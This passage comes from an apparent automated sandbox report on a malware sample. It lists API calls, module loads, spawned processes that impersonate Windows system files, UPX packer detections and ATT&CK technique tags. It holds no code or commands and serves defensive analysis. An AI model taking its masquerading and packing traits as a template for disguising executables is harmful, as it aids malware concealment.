with a parameter kernel32 (UID: 00000000-00000812)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000812)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000812)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000812)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000812)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000812)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000812)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005732)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005732)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005732)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005732)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005732)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005732)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005732)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005732)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001872)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001872)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001872)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001872)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001872)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001872)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001872)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001872)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001872)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001872)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00000656)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002040)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002040)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002040)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002040)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002040)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002040)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005000)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005000)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005000)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005000)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005000)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005000)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005000)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005000)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005000)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005000)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005000)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005508)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005508)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005508)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005508)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005508)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005508)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005428)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005428)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003156)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004188)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004188)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004188)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004188)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004188)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004188)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004188)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004288)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004288)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004288)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004288)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004288)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004288)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004288)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004288)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004288)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004288)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004348)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004348)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004348)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004348)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004348)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005548)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005548)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005548)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005548)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005548)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005548)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005548)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005548)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005548)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001208)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001208)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001208)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001208)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001208)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001208)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002432)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002432)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002432)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002432)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002432)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002432)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004144)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004144)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004144)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004144)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004144)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004144)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75DC0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75DC0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75DC0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75DC0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75DC0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75DC0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75DC0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75DC0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"4k51k4.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00005636)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005272)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003900)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005632)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002108)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005328)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004156)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003136)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005500)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003236)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003752)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003220)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005756)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002164)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005308)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000944)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000932)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003276)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005584)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000812)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005732)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00001872)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000656)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002040)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005000)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00005636)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005272)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003900)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005632)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002108)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005328)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004156)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003136)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005500)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003236)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003752)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003220)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005756)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002164)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005308)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000944)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000932)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003276)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005584)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000812)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005732)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00001872)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000656)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002040)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005000)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" was detected as \"UPX\" and name: \"Packer\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4k51k4.exe.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4k51k4.exe.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4k51k4.exe.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"UPX\" and name: \"Packer\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C38A.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C38A.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C38A.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9DE16.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9DE16.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9DE16.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrHelloween.scr\" was detected as \"UPX\" and name: \"Packer\"\n \"MrHelloween.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrHelloween.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C38C.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C38C.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C38C.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500526e9276@CRYPTSP.dll\"\n \"10001100f4123a75@rsaenh.dll\"\n \"10001100e0123a75@rsaenh.dll\"\n \"08000900d4123a75@rsaenh.dll\"\n \"0b000c00c8123a75@rsaenh.dll\"\n \"0c000d00b8123a75@rsaenh.dll\"\n \"0d000e00a8123a75@rsaenh.dll\"\n \"0d000e0098123a75@rsaenh.dll\"\n \"0b000c008c123a75@rsaenh.dll\"\n \"0b000c0080123a75@rsaenh.dll\"\n \"09000a0074123a75@rsaenh.dll\"\n \"09000a0068123a75@rsaenh.dll\"\n \"0c000d0058123a75@rsaenh.dll\"\n \"0a000b004c123a75@rsaenh.dll\"\n \"1000110038123a75@rsaenh.dll\"\n \"0d000e0028123a75@rsaenh.dll\"\n \"0a000b001c123a75@rsaenh.dll\"\n \"1100120008123a75@rsaenh.dll\"\n \"0b000c00fc113a75@rsaenh.dll\"\n \"0c000d00ec113a75@rsaenh.dll\"\n \"0e000f00dc113a75@rsaenh.dll\"\n \"0e000f00cc113a75@rsaenh.dll\"\n \"0e000f00bc113a75@rsaenh.dll\"\n \"0e000f00ac113a75@rsaenh.dll\"\n \"0e000f009c113a75@rsaenh.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": 